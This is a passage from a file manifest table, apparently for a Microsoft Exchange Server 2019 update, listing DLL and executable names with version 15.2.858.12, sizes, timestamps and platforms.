7,873,936| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.management.recipient.dll| 15.2.858.12| 1,501,560| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.management.snapin.esm.dll| 15.2.858.12| 71,568| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.management.systemmanager.dll| 15.2.858.12| 1,249,144| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.management.transport.dll| 15.2.858.12| 1,876,360| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.managementgui.dll| 15.2.858.12| 5,366,672| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.managementmsg.dll| 15.2.858.12| 36,240| 27-Apr-21| 13:29| x64 \nMicrosoft.exchange.mapihttpclient.dll| 15.2.858.12| 117,640| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.mapihttphandler.dll| 15.2.858.12| 209,808| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.messagesecurity.dll| 15.2.858.12| 79,744| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.messagesecurity.messagesecuritymsg.dll| 15.2.858.12| 17,296| 27-Apr-21| 13:27| x64 \nMicrosoft.exchange.messagingpolicies.dlppolicyagent.dll| 15.2.858.12| 156,032| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 15.2.858.12| 65,936| 27-Apr-21| 13:26| x86 \nMicrosoft.exchange.messagingpolicies.eventlog.dll| 15.2.858.12| 30,584| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.messagingpolicies.filtering.dll| 15.2.858.12| 58,248| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.messagingpolicies.hygienerules.dll| 15.2.858.12| 29,584| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 15.2.858.12| 175,488| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 15.2.858.12| 28,536| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.messagingpolicies.retentionpolicyagent.dll| 15.2.858.12| 75,128| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 15.2.858.12| 207,240| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.messagingpolicies.rules.dll| 15.2.858.12| 440,712| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.messagingpolicies.supervisoryreviewagent.dll| 15.2.858.12| 83,320| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.messagingpolicies.transportruleagent.dll| 15.2.858.12| 35,208| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.messagingpolicies.unifiedpolicycommon.dll| 15.2.858.12| 53,112| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.messagingpolicies.unjournalagent.dll| 15.2.858.12| 96,640| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.migration.dll| 15.2.858.12| 1,110,416| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.migrationworkflowservice.eventlog.dll| 15.2.858.12| 14,736| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.mobiledriver.dll| 15.2.858.12| 135,560| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.monitoring.activemonitoring.local.components.dll| 15.2.858.12| 5,065,072| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.monitoring.servicecontextprovider.dll| 15.2.858.12| 19,840| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.mrsmlbconfiguration.dll| 15.2.858.12| 68,488| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.net.dll| 15.2.858.12| 5,086,088| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.net.rightsmanagement.dll| 15.2.858.12| 265,608| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.networksettings.dll| 15.2.858.12| 37,776| 27-Apr-21| 13:26| x86 \nMicrosoft.exchange.notifications.broker.eventlog.dll| 15.2.858.12| 14,216| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.notifications.broker.exe| 15.2.858.12| 549,752| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.oabauthmodule.dll| 15.2.858.12| 22,920| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.oabrequesthandler.dll| 15.2.858.12| 106,376| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.oauth.core.dll| 15.2.858.12| 291,720| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.objectstoreclient.dll| 15.2.858.12| 17,288| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.odata.configuration.dll| 15.2.858.12| 277,880| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.odata.dll| 15.2.858.12| 2,993,552| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.officegraph.common.dll| 15.2.858.12| 90,504| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.officegraph.grain.dll| 15.2.858.12| 101,752| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.officegraph.graincow.dll| 15.2.858.12| 38,264| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.officegraph.graineventbasedassistants.dll| 15.2.858.12| 45,456| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.officegraph.grainpropagationengine.dll| 15.2.858.12| 58,256| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.officegraph.graintransactionstorage.dll| 15.2.858.12| 147,336| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.officegraph.graintransportdeliveryagent.dll| 15.2.858.12| 26,488| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.officegraph.graphstore.dll| 15.2.858.12| 184,184| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.officegraph.permailboxkeys.dll| 15.2.858.12| 26,512| 27-Apr-21| 13:26| x86 \nMicrosoft.exchange.officegraph.secondarycopyquotamanagement.dll| 15.2.858.12| 38,264| 27-Apr-21| 13:26| x86 \nMicrosoft.exchange.officegraph.secondaryshallowcopylocation.dll| 15.2.858.12| 55,696| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.officegraph.security.dll| 15.2.858.12| 147,344| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.officegraph.semanticgraph.dll| 15.2.858.12| 191,864| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.officegraph.tasklogger.dll| 15.2.858.12| 33,680| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.partitioncache.dll| 15.2.858.12| 28,024| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.passivemonitoringsettings.dll| 15.2.858.12| 32,656| 27-Apr-21| 13:26| x86 \nMicrosoft.exchange.photogarbagecollectionservicelet.dll| 15.2.858.12| 15,224| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.pop3.eventlog.dll| 15.2.858.12| 17,272| 27-Apr-21| 13:24| x64 \nMicrosoft.exchange.pop3.eventlog.dll.fe| 15.2.858.12| 17,272| 27-Apr-21| 13:24| Not applicable \nMicrosoft.exchange.pop3.exe| 15.2.858.12| 106,896| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.pop3.exe.fe| 15.2.858.12| 106,896| 27-Apr-21| 13:24| Not applicable \nMicrosoft.exchange.pop3service.exe| 15.2.858.12| 24,952| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.pop3service.exe.fe| 15.2.858.12| 24,952| 27-Apr-21| 13:24| Not applicable \nMicrosoft.exchange.popconfiguration.dl1| 15.2.858.12| 42,896| 27-Apr-21| 13:24| Not applicable \nMicrosoft.exchange.popimap.core.dll| 15.2.858.12| 264,584| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.popimap.core.dll.fe| 15.2.858.12| 264,584| 27-Apr-21| 13:24| Not applicable \nMicrosoft.exchange.powersharp.dll| 15.2.858.12| 358,264| 27-Apr-21| 13:26| x86 \nMicrosoft.exchange.powersharp.management.dll| 15.2.858.12| 4,166,544| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.powershell.configuration.dll| 15.2.858.12| 308,624| 27-Apr-21| 13:28| x64 \nMicrosoft.exchange.powershell.rbachostingtools.dll| 15.2.858.12| 41,352| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.protectedservicehost.exe| 15.2.858.12| 30,608| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.protocols.fasttransfer.dll| 15.2.858.12| 137,088| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.protocols.mapi.dll| 15.2.858.12| 441,736| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.provisioning.eventlog.dll| 15.2.858.12| 14,200| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.provisioningagent.dll| 15.2.858.12| 224,656| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.provisioningservicelet.dll| 15.2.858.12| 105,848| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.pst.dll| 15.2.858.12| 168,848| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.pst.dll.deploy| 15.2.858.12| 168,848| 27-Apr-21| 13:24| Not applicable \nMicrosoft.exchange.pswsclient.dll| 15.2.858.12| 259,464| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.publicfolders.dll| 15.2.858.12| 72,056| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.pushnotifications.crimsonevents.dll| 15.2.858.12| 215,928| 27-Apr-21| 13:27| x64 \nMicrosoft.exchange.pushnotifications.dll| 15.2.858.12| 106,896| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.pushnotifications.publishers.dll| 15.2.858.12| 425,848| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.pushnotifications.server.dll| 15.2.858.12| 70,536| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.query.analysis.dll| 15.2.858.12| 46,456| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.query.configuration.dll| 15.2.858.12| 215,928| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.query.core.dll| 15.2.858.12| 168,848| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.query.ranking.dll| 15.2.858.12| 343,432| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.query.retrieval.dll| 15.2.858.12| 174,456| 27-Apr-21| 13:26| x86 \nMicrosoft.exchange.query.suggestions.dll| 15.2.858.12| 95,120| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.realtimeanalyticspublisherservicelet.dll| 15.2.858.12| 127,368| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.relevance.core.dll| 15.2.858.12| 63,368| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.relevance.data.dll| 15.2.858.12| 36,728| 27-Apr-21| 13:26| x64 \nMicrosoft.exchange.relevance.mailtagger.dll| 15.2.858.12| 17,800| 27-Apr-21| 13:29| x64 \nMicrosoft.exchange.relevance.people.dll| 15.2.858.12| 9,666,960| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.relevance.peopleindex.dll| 15.2.858.12| #########| 27-Apr-21| 13:28| x64 \nMicrosoft.exchange.relevance.peopleranker.dll| 15.2.858.12| 36,744| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.relevance.perm.dll| 15.2.858.12| 97,680| 27-Apr-21| 13:29| x64 \nMicrosoft.exchange.relevance.sassuggest.dll| 15.2.858.12| 28,552| 27-Apr-21| 13:28| x64 \nMicrosoft.exchange.relevance.upm.dll| 15.2.858.12| 72,072| 27-Apr-21| 13:28| x64 \nMicrosoft.exchange.routing.client.dll| 15.2.858.12| 15,752| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.routing.eventlog.dll| 15.2.858.12| 13,200| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.routing.server.exe| 15.2.858.12| 59,280| 27-Apr-21| 13:26| x86 \nMicrosoft.exchange.rpc.dll| 15.2.858.12| 1,647,504| 27-Apr-21| 13:23| x64 \nMicrosoft.exchange.rpcclientaccess.dll| 15.2.858.12| 209,808| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.rpcclientaccess.exmonhandler.dll| 15.2.858.12| 60,296| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.rpcclientaccess.handler.dll| 15.2.858.12| 518,008| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.rpcclientaccess.monitoring.dll| 15.2.858.12| 161,160| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.rpcclientaccess.parser.dll| 15.2.858.12| 724,360| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.rpcclientaccess.server.dll| 15.2.858.12| 243,064| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.rpcclientaccess.service.eventlog.dll| 15.2.858.12| 20,880| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.rpcclientaccess.service.exe| 15.2.858.12| 35,192| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.rpchttpmodules.dll| 15.2.858.12| 42,360| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.dll| 15.2.858.12| 56,184| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.eventlog.dll| 15.2.858.12| 27,528| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.rules.common.dll| 15.2.858.12| 130,440| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.saclwatcher.eventlog.dll| 15.2.858.12| 14,720| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.saclwatcherservicelet.dll| 15.2.858.12| 20,368| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.safehtml.dll| 15.2.858.12| 21,384| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.sandbox.activities.dll| 15.2.858.12| 267,656| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.sandbox.contacts.dll| 15.2.858.12| 110,984| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.sandbox.core.dll| 15.2.858.12| 112,520| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.sandbox.services.dll| 15.2.858.12| 622,456| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.search.bigfunnel.dll| 15.2.858.12| 185,232| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.search.bigfunnel.eventlog.dll| 15.2.858.12| 12,176| 27-Apr-21| 13:27| x64 \nMicrosoft.exchange.search.blingwrapper.dll| 15.2.858.12| 19,336| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.search.core.dll| 15.2.858.12| 211,832| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.search.ediscoveryquery.dll| 15.2.858.12| 17,800| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.search.engine.dll| 15.2.858.12| 97,672| 27-Apr-21| 13:26| x86 \nMicrosoft.exchange.search.fast.configuration.dll| 15.2.858.12| 16,760| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.search.fast.dll| 15.2.858.12| 436,600| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.search.files.dll| 15.2.858.12| 274,320| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.search.flighting.dll| 15.2.858.12| 24,976| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.search.mdb.dll| 15.2.858.12| 217,976| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.search.service.exe| 15.2.858.12| 26,512| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.security.applicationencryption.dll| 15.2.858.12| 221,064| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.security.dll| 15.2.858.12| 1,559,440| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.security.msarpsservice.exe| 15.2.858.12| 19,856| 27-Apr-21| 13:26| x86 \nMicrosoft.exchange.security.securitymsg.dll| 15.2.858.12| 28,536| 27-Apr-21| 13:23| x64 \nMicrosoft.exchange.server.storage.admininterface.dll| 15.2.858.12| 225,144| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.server.storage.common.dll| 15.2.858.12| 5,151,104| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.server.storage.diagnostics.dll| 15.2.858.12| 214,920| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.server.storage.directoryservices.dll| 15.2.858.12| 115,592| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.server.storage.esebackinterop.dll| 15.2.858.12| 82,808| 27-Apr-21| 13:29| x64 \nMicrosoft.exchange.server.storage.eventlog.dll| 15.2.858.12| 80,784| 27-Apr-21| 13:29| x64 \nMicrosoft.exchange.server.storage.fulltextindex.dll| 15.2.858.12| 66,424| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.server.storage.ha.dll| 15.2.858.12| 81,288| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.server.storage.lazyindexing.dll| 15.2.858.12| 211,832| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.server.storage.logicaldatamodel.dll| 15.2.858.12| 1,341,328| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.server.storage.mapidisp.dll| 15.2.858.12| 511,880| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.server.storage.multimailboxsearch.dll| 15.2.858.12| 47,480| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.server.storage.physicalaccess.dll| 15.2.858.12| 873,872| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.server.storage.propertydefinitions.dll| 15.2.858.12| 1,352,568| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.server.storage.propertytag.dll| 15.2.858.12| 30,608| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.server.storage.rpcproxy.dll| 15.2.858.12| 130,440| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.server.storage.storecommonservices.dll| 15.2.858.12| 1,018,760| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.server.storage.storeintegritycheck.dll| 15.2.858.12| 111,488| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.server.storage.workermanager.dll| 15.2.858.12| 34,704| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.server.storage.xpress.dll| 15.2.858.12| 19,344| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.servicehost.eventlog.dll| 15.2.858.12| 14,712| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.servicehost.exe| 15.2.858.12| 60,808| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.dll| 15.2.858.12| 50,552| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.eventlog.dll| 15.2.858.12| 14,200| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.servicelets.unifiedpolicysyncservicelet.eventlog.dll| 15.2.858.12| 14,200| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.services.common.dll| 15.2.858.12| 74,120| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.services.dll| 15.2.858.12| 8,480,144| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.services.eventlogs.dll| 15.2.858.12| 30,072| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.services.ewshandler.dll| 15.2.858.12| 633,744| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.services.ewsserialization.dll| 15.2.858.12| 1,651,088| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.services.json.dll| 15.2.858.12| 296,312| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.services.messaging.dll| 15.2.858.12| 43,408| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.services.onlinemeetings.dll| 15.2.858.12| 233,360| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.services.surface.dll| 15.2.858.12| 178,576| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.services.wcf.dll| 15.2.858.12| 348,536| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.setup.acquirelanguagepack.dll| 15.2.858.12| 56,696| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.setup.bootstrapper.common.dll| 15.2.858.12| 93,048| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.setup.common.dll| 15.2.858.12| 296,312| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.setup.commonbase.dll| 15.2.858.12| 35,720| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.setup.console.dll| 15.2.858.12| 27,024| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.setup.gui.dll| 15.2.858.12| 114,576| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.setup.parser.dll| 15.2.858.12| 53,624| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.setup.signverfwrapper.dll| 15.2.858.12| 75,152| 27-Apr-21| 13:29| x64 \nMicrosoft.exchange.sharedcache.caches.dll| 15.2.858.12| 142,736| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.sharedcache.client.dll| 15.2.858.12| 24,952| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.sharedcache.eventlog.dll| 15.2.858.12| 15,224| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.sharedcache.exe| 15.2.858.12| 58,760| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.sharepointsignalstore.dll| 15.2.858.12| 27,016| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.slabmanifest.dll| 15.2.858.12| 46,992| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.sqm.dll| 15.2.858.12| 46,992| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.store.service.exe| 15.2.858.12| 28,032| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.store.worker.exe| 15.2.858.12| 26,504| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.storeobjectsservice.eventlog.dll| 15.2.858.12| 13,712| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.storeobjectsservice.exe| 15.2.858.12| 31,624| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.storeprovider.dll| 15.2.858.12| 1,205,136| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.structuredquery.dll| 15.2.858.12| 158,584| 27-Apr-21| 13:28| x64 \nMicrosoft.exchange.symphonyhandler.dll| 15.2.858.12| 628,104| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.syncmigration.eventlog.dll| 15.2.858.12| 13,176| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.syncmigrationservicelet.dll| 15.2.858.12| 16,272| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.systemprobemsg.dll| 15.2.858.12| 13,184| 27-Apr-21| 13:23| x64 \nMicrosoft.exchange.textprocessing.dll| 15.2.858.12| 221,584| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.textprocessing.eventlog.dll| 15.2.858.12| 13,712| 27-Apr-21| 13:23| x64 \nMicrosoft.exchange.transport.agent.addressbookpolicyroutingagent.dll| 15.2.858.12| 29,048| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.transport.agent.antispam.common.dll| 15.2.858.12| 138,616| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.transport.agent.contentfilter.cominterop.dll| 15.2.858.12| 21,880| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.transport.agent.controlflow.dll| 15.2.858.12| 40,328| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.transport.agent.faultinjectionagent.dll| 15.2.858.12| 22,920| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.transport.agent.frontendproxyagent.dll| 15.2.858.12| 21,384| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.transport.agent.hygiene.dll| 15.2.858.12| 212,344| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.transport.agent.interceptoragent.dll| 15.2.858.12| 98,696| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.transport.agent.liveidauth.dll| 15.2.858.12| 22,920| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.transport.agent.malware.dll| 15.2.858.12| 169,360| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.transport.agent.malware.eventlog.dll| 15.2.858.12| 18,320| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.transport.agent.phishingdetection.dll| 15.2.858.12| 20,856| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.transport.agent.prioritization.dll| 15.2.858.12| 31,608| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 15.2.858.12| 46,984| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.transport.agent.search.dll| 15.2.858.12| 30,088| 27-Apr-21| 13:25| x86 \nMicrosoft.exchange.transport.agent.senderid.core.dll| 15.2.858.12| 53,112| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll| 15.2.858.12| 44,936| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.transport.agent.systemprobedrop.dll| 15.2.858.12| 18,320| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.transport.agent.transportfeatureoverrideagent.dll| 15.2.858.12| 46,456| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.transport.agent.trustedmailagents.dll| 15.2.858.12| 46,456| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.transport.cloudmonitor.common.dll| 15.2.858.12| 28,024| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.transport.common.dll| 15.2.858.12| 457,096| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.transport.contracts.dll| 15.2.858.12| 18,312| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.transport.decisionengine.dll| 15.2.858.12| 30,584| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.transport.dll| 15.2.858.12| 4,183,944| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.transport.dsapiclient.dll| 15.2.858.12| 182,152| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.transport.eventlog.dll| 15.2.858.12| 121,736| 27-Apr-21| 13:23| x64 \nMicrosoft.exchange.transport.extensibility.dll| 15.2.858.12| 403,848| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.transport.extensibilityeventlog.dll| 15.2.858.12| 14,720| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.transport.flighting.dll| 15.2.858.12| 89,992| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.transport.logging.dll| 15.2.858.12| 88,968| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.transport.logging.search.dll| 15.2.858.12| 68,488| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.transport.loggingcommon.dll| 15.2.858.12| 63,368| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.transport.monitoring.dll| 15.2.858.12| 430,472| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.transport.net.dll| 15.2.858.12| 122,256| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.transport.protocols.contracts.dll| 15.2.858.12| 17,800| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.transport.protocols.dll| 15.2.858.12| 29,048| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.transport.protocols.httpsubmission.dll| 15.2.858.12| 60,816| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.transport.requestbroker.dll| 15.2.858.12| 50,040| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.transport.scheduler.contracts.dll| 15.2.858.12| 33,160| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.transport.scheduler.dll| 15.2.858.12| 113,040| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.transport.smtpshared.dll| 15.2.858.12| 18,312| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.transport.storage.contracts.dll| 15.2.858.12| 52,088| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.transport.storage.dll| 15.2.858.12| 675,200| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.transport.storage.management.dll| 15.2.858.12| 23,952| 27-Apr-21| 13:26| x86 \nMicrosoft.exchange.transport.sync.agents.dll| 15.2.858.12| 17,800| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.transport.sync.common.dll| 15.2.858.12| 487,288| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.transport.sync.common.eventlog.dll| 15.2.858.12| 12,664| 27-Apr-21| 13:24| x64 \nMicrosoft.exchange.transport.sync.manager.dll| 15.2.858.12| 306,056| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.transport.sync.manager.eventlog.dll| 15.2.858.12| 15,760| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.transport.sync.migrationrpc.dll| 15.2.858.12| 46,456| 27-Apr-21| 13:27| x86 \nMicrosoft.exchange.transport.sync.worker.dll| 15.2.858.12| 1,044,352| 27-Apr-21| 13:29| x86 \nMicrosoft.exchange.transport.sync.worker.eventlog.dll| 15.2.858.12| 15,224| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.transportlogsearch.eventlog.dll| 15.2.858.12| 18,824| 27-Apr-21| 13:25| x64 \nMicrosoft.exchange.transportsyncmanagersvc.exe| 15.2.858.12| 18,808| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.um.troubleshootingtool.shared.dll| 15.2.858.12| 118,648| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.um.umcommon.dll| 15.2.858.12| 924,560| 27-Apr-21| 13:26| x86 \nMicrosoft.exchange.um.umcore.dll| 15.2.858.12| 1,469,320| 27-Apr-21| 13:28| x86 \nMicrosoft.exchange.um.umvariantconfiguration.dll| 15.2.858.12| 32,648| 27-Apr-21| 13:23| x86 \nMicrosoft.exchange.unifiedcontent.dll| 15.2.858.12| 41,864| 27-Apr-21| 13:24| x86 \nMicrosoft.exchange.unifiedcontent.exchange.dll| 15.2.858.12| 24,968| 